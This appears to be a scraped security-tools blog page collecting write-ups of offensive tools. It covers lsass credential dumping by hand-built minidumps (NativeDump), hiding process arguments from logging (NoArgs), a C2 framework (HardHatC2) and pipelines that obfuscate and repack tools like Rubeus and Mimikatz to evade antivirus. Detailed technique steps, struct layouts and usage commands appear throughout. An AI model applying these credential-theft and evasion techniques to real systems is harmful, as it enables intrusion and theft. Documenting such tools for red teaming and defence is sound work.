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NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Zion3R

NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).

  • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
  • NtOpenProcess to get a handle for the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream


NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp":

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding

Technique in detail: Creating a minimal Minidump file

After reading Minidump undocumented structures, its structure can be summed up to:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes from the process from each memory region which can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.

A. Header

The header is a 32-bytes structure which can be defined in C# as:

public struct MinidumpHeader
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;

The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header

B. Stream Directory

Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
public uint StreamType;
public uint Size;
public uint Location;

The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 HandleOperationListStream

C. SystemInformation Stream

First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;

The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)

D. ModuleList Stream

Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

public struct ModuleListStream
public uint NumberOfModules;
public ModuleInfo[] Modules;

As there is only one, it gets simplified to:

public struct ModuleListStream
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;

The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)

E. Memory64List Stream

Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

public struct Memory64ListStream
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;

Each module entry is a 16-bytes structure:

public struct Memory64Info
public IntPtr Address;
public IntPtr Size;

The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them

F. Looping memory regions

There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
  2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream

G. Creating Minidump file

After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.

NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

By: Zion3R

NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.

Default Cmd:

Windows Event Logs:

Using NoArgs:

Windows Event Logs:

Functionality Overview

The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism

Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation

The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

Demo: Running Mimikatz and passing it the arguments:

Process Hacker View:

All the arguemnts are hidden dynamically

Process Monitor View:

Technical Implementation

  1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

  2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

  3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

  4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

  5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

Installation and Usage:

Option 1: Compile NoArgs DLL:

  • You will need microsoft/Detours">Microsoft Detours installed.

  • Compile the DLL.

  • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

Option 2: Download the compiled executable (ready-to-go) from the releases page.



Agent Racoon Backdoor Targets Organizations in Middle East, Africa, and U.S.

Organizations in the Middle East, Africa, and the U.S. have been targeted by an unknown threat actor to distribute a new backdoor called Agent Racoon. "This malware family is written using the .NET framework and leverages the domain name service (DNS) protocol to create a covert channel and provide different backdoor functionalities," Palo Alto Networks Unit 42 researcher Chema Garcia 

HardHatC2 - A C# Command And Control Framework

By: Zion3R

A cross-platform, collaborative, Command & Control framework written in C#, designed for red teaming and ease of use.

HardHat is a multiplayer C# .NET-based command and control framework. Designed to aid in red team engagements and penetration testing. HardHat aims to improve the quality of life factors during engagements by providing an easy-to-use but still robust C2 framework.
It contains three primary components, an ASP.NET teamserver, a blazor .NET client, and C# based implants.

Release Tracking

Alpha Release - 3/29/23 NOTE: HardHat is in Alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.


Discord Join the community to talk about HardHat C2, Programming, Red teaming and general cyber security things The discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.


Teamserver & Client

  • Per-operator accounts with account tiers to allow customized access control and features, including view-only guest modes, team-lead opsec approval(WIP), and admin accounts for general operation management.
  • Managers (Listeners)
  • Dynamic Payload Generation (Exe, Dll, shellcode, PowerShell command)
  • Creation & editing of C2 profiles on the fly in the client
  • Customization of payload generation
    • sleep time/jitter
    • kill date
    • working hours
    • type (Exe, Dll, Shellcode, ps command)
    • Included commands(WIP)
    • option to run confuser
  • File upload & Downloads
  • Graph View
  • File Browser GUI
  • Event Log
  • JSON logging for events & tasks
  • Loot tracking (Creds, downloads)
  • IOC tracing
  • Pivot proxies (SOCKS 4a, Port forwards)
  • Cred store
  • Autocomplete command history
  • Detailed help command
  • Interactive bash terminal command if the client is on linux or powershell on windows, this allows automatic parsing and logging of terminal commands like proxychains
  • Persistent database storage of teamserver items (User accounts, Managers, Engineers, Events, tasks, creds, downloads, uploads, etc. )
  • Recon Entity Tracking (track info about users/devices, random metadata as needed)
  • Shared files for some commands (see teamserver page for details)
  • tab-based interact window for command issuing
  • table-based output option for some commands like ls, ps, etc.
  • Auto parsing of output from seatbelt to create "recon entities" and fill entries to reference back to later easily
  • Dark and Light


  • C# .NET framework implant for windows devices, currently only CLR/.NET 4 support
  • atm only one implant, but looking to add others
  • It can be generated as EXE, DLL, shellcode, or PowerShell stager
  • Rc4 encryption of payload memory & heap when sleeping (Exe / DLL only)
  • AES encryption of all network communication
  • ConfuserEx integration for obfuscation
  • HTTP, HTTPS, TCP, SMB communication
    • TCP & SMB can work P2P in a bind or reverse setups
  • Unique per implant key generated at compile time
  • multiple callback URI's depending on the C2 profile
  • P/Invoke & D/Invoke integration for windows API calls
  • SOCKS 4a support
  • Reverse Port Forward & Port Forwards
  • All commands run as async cancellable jobs
    • Option to run commands sync if desired
  • Inline assembly execution & inline shellcode execution
  • DLL Injection
  • Execute assembly & Mimikatz integration
  • Mimikatz is not built into the implant but is pushed when specific commands are issued
  • Various localhost & network enumeration tools
  • Token manipulation commands
    • Steal Token Mask(WIP)
  • Lateral Movement Commands
  • Jump (psexec, wmi, wmi-ps, winrm, dcom)
  • Remote Execution (WIP)
  • AMSI & ETW Patching
  • Unmanaged Powershell
  • Script Store (can load multiple scripts at once if needed)
  • Spawn & Inject
    • Spawn-to is configurable
  • run, shell & execute


documentation can be found at docs

Getting Started


  • Installation of the .net 7 SDK from Microsoft
  • Once installed, the teamserver and client are started with dotnet run


To configure the team server's starting address (where clients will connect), edit the HardHatC2\TeamServer\Properties\LaunchSettings.json changing the "applicationUrl": "" to the desired location and port. start the teamserver with dotnet run from its top-level folder ../HrdHatC2/Teamserver/

HardHat Client

  1. When starting the client to set the target teamserver location, include it in the command line dotnet run for example
  2. open a web browser and navigate to https://localhost:7096/ if this works, you should see the login page
  3. Log in with the HardHat_Admin user (Password is printed on first TeamServer startup)
  4. Navigate to the settings page & create a new user if successful, a message should appear, then you may log in with that account to access the full client

Contributions & Bug Reports

Code contributions are welcome feel free to submit feature requests, pull requests or send me your ideas on discord.

OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises

OfensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises.
A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.


  • Currently only supports C# (.Net Framework) projects
  • Allows to clone public and private (you will need credentials :D) git repositories
  • Allows to work with local folders
  • Randomizes project GUIDs
  • Randomizes application information contained in AssemblyInfo
  • Builds C# projects
  • Obfuscates generated binaries
  • Generates shellcodes from binaries
  • There are 79 tools parameterised in YML templates (not all of them may work :D)
  • New tools can be added using YML templates
  • It should be easy to add new plugins...

What's new in version 2.0

  • Almost complete code rewrite (new bugs?)
  • Cloning from private repositories possible (authentication via GitHub authToken)
  • Possibility to copy a local folder instead of cloning from a remote repository
  • New module to generate shellcodes with Donut
  • New module to randomize GUIDs of applications
  • New module to randomize the AssemblyInfo of each application
  • 60 new tools added


  • List all tools:
OffensivePipeline.exe list
  • Build all tools:
OffensivePipeline.exe all
  • Build a tool
OffensivePipeline.exe t toolName
  • Clean cloned and build tools

Output example

PS C:\OffensivePipeline> .\OffensivePipeline.exe t rubeus

.osooooM M
___ __ __ _ ____ _ _ _ +y. M M
/ _ \ / _|/ _| ___ _ __ ___(_)_ _____| _ \(_)_ __ ___| (_)_ __ ___ :h .yoooMoM
| | | | |_| |_ / _ \ '_ \/ __| \ \ / / _ \ |_) | | '_ \ / _ \ | | '_ \ / _ \ oo oo
| |_| | _| _| __/ | | \__ \ |\ V / __/ __/| | |_) | __/ | | | | | __/ oo oo
\___/|_| |_| \___|_| |_|___/_| \_/ \___|_| |_| .__/ \___|_|_|_| |_|\___| oo oo
|_| MoMoooy. h:
M M .y+
M Mooooso.


[+] Loading tool: Rubeus
Clonnig repository: Rubeus into C:\OffensivePipeline\Git\Rubeus
Repository Rubeus cloned into C:\OffensivePipeline\Git\Rubeus

[+] Load RandomGuid module
Searching GUIDs...
> C:\OffensivePipeline\Git\Rubeus\Rubeus.sln
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
Replacing GUIDs...
File C:\OffensivePipeline\Git\Rubeus\Rubeus.sln:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!

[+] Load RandomAssemblyInfo module
Replacing strings in C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
[assembly: AssemblyTitle("Rubeus")] -> [assembly: AssemblyTitle("g4ef3fvphre")]
[assembly: AssemblyDescription("")] -> [assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")] -> [assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")] -> [assembly: AssemblyCompany("")]
[assembly: AssemblyProduc t("Rubeus")] -> [assembly: AssemblyProduct("g4ef3fvphre")]
[assembly: AssemblyCopyright("Copyright ยฉ 2018")] -> [assembly: AssemblyCopyright("Copyright ยฉ 2018")]
[assembly: AssemblyTrademark("")] -> [assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")] -> [assembly: AssemblyCulture("")]

[+] Load BuildCsharp module
[+] Checking requirements...
[*] Downloading nuget.exe from
[+] Download OK - nuget.exe
[+] Path found - C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat
Solving dependences with nuget...
Building solution...
[+] No errors!
[+] Output folder: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud

[+] Load ConfuserEx module
[+] Checking requirements...
[+] Downloading ConfuserEx from
[+] Download OK - ConfuserEx
[+] No errors!

[+] Load Donut module
Generating shellcode...

Payload options:
Domain: RMM6XFC3

Raw Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin
B64 Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin.b64

[+] No errors!

[+] Generating Sha256 hashes
Output file: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


- Rubeus
- RandomGuid: OK
- RandomAssemblyInfo: OK
- BuildCsharp: OK
- ConfuserEx: OK
- Donut: OK



  • RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
  • RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
  • BuildCsharp: build c# project
  • ConfuserEx: obfuscate c# tools
  • Donut: use Donut to generate shellcodes. The shellcode generated is without parameters, in future releases this may be changed.

Add a tool from a remote git

The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:

  • Rubeus.yml file:
- name: Rubeus
description: Rubeus is a C# toolset for raw Kerberos interaction and abuses
solutionPath: Rubeus\Rubeus.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut


  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use on this tool build process
  • AuthUser: user name from github (not used for public repositories)
  • AuthToken: auth token from github (not used for public repositories)

Add a tool from a private git

- name: SharpHound3-Custom
description: C# Rewrite of the BloodHound Ingestor
solutionPath: SharpHound3-Custom\SharpHound3.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser: aaaaaaa
authToken: abcdefghijklmnopqrsthtnf


  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to user on this tool build process
  • AuthUser: user name from GitHub
  • AuthToken: auth token from GitHub (documented at GitHub: creating a personal access token)

Add a tool from local git folder

- name: SeatbeltLocal
description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
gitLink: C:\Users\alpha\Desktop\SeatbeltLocal
solutionPath: SeatbeltLocal\Seatbelt.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut


  • Name: name of the tool
  • Description: tool description
  • GitLink: path where the tool is located
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to user on this tool build process
  • AuthUser: user name from github (not used for local repositories)
  • AuthToken: auth token from github (not used for local repositories)

Requirements for the release version (Visual Studio 2019/2022 is not required)

In the OffensivePipeline.dll.config file it's possible to change the version of the build tools used.

  • Build Tools 2019:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\Common7\Tools\VsDevCmd.bat"/>
  • Build Tools 2022:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat"/>

Requirements for build


Supported tools

ProtectMyTooling - Multi-Packer Wrapper Letting Us Daisy-Chain Various Packers, Obfuscators And Other Red Team Oriented Weaponry

Script that wraps around multitude of packers, protectors, obfuscators, shellcode loaders, encoders, generators to produce complex protected Red Team implants. Your perfect companion in Malware Development CI/CD pipeline, helping watermark your artifacts, collect IOCs, backdoor and more.

With ProtectMyTooling you can quickly obfuscate your binaries without having to worry about clicking through all the Dialogs, interfaces, menus, creating projects to obfuscate a single binary, clicking through all the options available and wasting time about all that nonsense. It takes you straight to the point - to obfuscate your tool.

Aim is to offer the most convenient interface possible and allow to leverage a daisy-chain of multiple packers combined on a single binary.

That's right - we can launch ProtectMyTooling with several packers at once:

C:\> py hyperion,upx mimikatz.exe mimikatz-obf.exe

The above example will firstly pass mimikatz.exe to the Hyperion for obfuscation, and then the result will be provided to UPX for compression. Resulting with UPX(Hyperion(file))


  • Supports multiple different PE Packers, .NET Obfuscators, Shellcode Loaders/Builders
  • Allows daisy-chaining packers where output from a packer is passed to the consecutive one: callobf,hyperion,upx will produce artifact UPX(Hyperion(CallObf(file)))
  • Collects IOCs at every obfuscation step so that auditing & Blue Team requests can be satisfied
  • Offers functionality to inject custom Watermarks to resulting PE artifacts - in DOS Stub, Checksum, as a standalone PE Section, to file's Overlay
  • Comes up with a handy Cobalt Strike aggressor script bringing protected-upload and protected-execute-assembly commands
  • Straightforward command line usage


This tool was designed to work on Windows, as most packers natively target that platform.

Some features may work however on Linux just fine, nonetheless that support is not fully tested, please report bugs and issues.

  1. First, disable your AV and add contrib directory to exclusions. That directory contains obfuscators, protectors which will get flagged by AV and removed.
  2. Then clone this repository
PS C:\> git clone --recurse
  1. Actual installation is straightforward:


PS C:\ProtectMyTooling> .\install.ps1


bash# ./


For ScareCrow packer to run on Windows 10, there needs to be WSL installed and bash.exe available (in %PATH%). Then, in WSL one needs to have golang installed in version at least 1.16:

cmd> bash
bash$ sudo apt update ; sudo apt upgrade -y ; sudo apt install golang=2:1.18~3 -y


To plug-in supported obfuscators, change default options or point ProtectMyTooling to your obfuscator executable path, you will need to adjust config\ProtectMyTooling.yaml configuration file.

There is also config\sample-full-config.yaml file containing all the available options for all the supported packers, serving as reference point.

Friendly reminder

  • If your produced binary crashes or doesn't run as expected - try using different packers chain.
  • Packers don't guarantee stability of produced binaries, therefore ProtectMyTooling cannot as well.
  • While chaining, carefully match output->input payload formats according to what consecutive packer expects.


Before ProtectMyTooling's first use, it is essential to adjust program's YAML configuration file ProtectMyTooling.yaml. The order of parameters processal is following:

  • Firstly default parameters are used
  • Then they're overwritten by values coming from YAML
  • Finally, whatever is provided in command line will overwrite corresponding values

There, supported packer paths and options shall be set to enable.

Scenario 1: Simple ConfuserEx obfuscation

Usage is very simple, all it takes is to pass the name of obfuscator to choose, input and output file paths:

C:\> py confuserex Rubeus.exe Rubeus-obf.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;\''';;;;\'\''',;;;'````;;;;;;;;\'\'''
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;\'''.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88" 888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <>

[.] Processing x86 file: "\Rubeus.exe"
[.] Generating output of ConfuserEx(<file>)...

[+] SUCCEEDED. Original file size: 417280 bytes, new file size ConfuserEx(<file>): 756224, ratio: 181.23%

Scenario 2: Simple ConfuserEx obfuscation followed by artifact test

One can also obfuscate the file and immediately attempt to launch it (also with supplied optional parameters) to ensure it runs fine with options -r --cmdline CMDLINE:

Scenario 3: Complex malware obfuscation with watermarking and IOCs collection

Below use case takes beacon.exe on input and feeds it consecutively into CallObf -> UPX -> Hyperion packers.

Then it will inject specified fooobar watermark to the final generated output artifact's DOS Stub as well as modify that artifact's checksum with value 0xAABBCCDD.

Finally, ProtectMyTooling will capture all IOCs (md5, sha1, sha256, imphash, and other metadata) and save them in auxiliary CSV file. That file can be used for IOC matching as engagement unfolds.

PS> py .\ callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd


[.] Processing x64 file: "beacon.exe"
[>] Generating output of CallObf(<file>)...

[.] Before obfuscation file's PE IMPHASH: 17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH: 378d9692fe91eb54206e98c224a25f43
[>] Generating output of UPX(CallObf(<file>))...

[>] Generating output of Hyperion(UPX(CallObf(<file>)))...

[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Successfully watermarked resulting artifact file.
[+] IOCs written to: beacon-obf-ioc.csv

[+] SUCCEEDED. Original file size: 288256 bytes, new file size Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%

Produced IOCs evidence CSV file will look as follows:

2022-06-10 03:15:52,beacon.exe,mgeeky@commandoVM,Input File,test,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,mgeeky@commandoVM,Obfuscation artifact: CallObf(<file>),test,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,mgeeky@commandoVM,Obfuscation artifact: UPX(CallObf(<file>)),test,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),te st,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Output obfuscated artifact,test,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d

Supported Packers

ProtectMyTooling was designed to support not only Obfuscators/Packers but also all sort of builders/generators/shellcode loaders usable from the command line.

At the moment, program supports various Commercial and Open-Source packers/obfuscators. Those Open-Source ones are bundled within the project. Commercial ones will require user to purchase the product and configure its location in ProtectMyTooling.yaml file to point the script where to find them.

  1. Amber - Reflective PE Packer that takes EXE/DLL on input and produces EXE/PIC shellcode
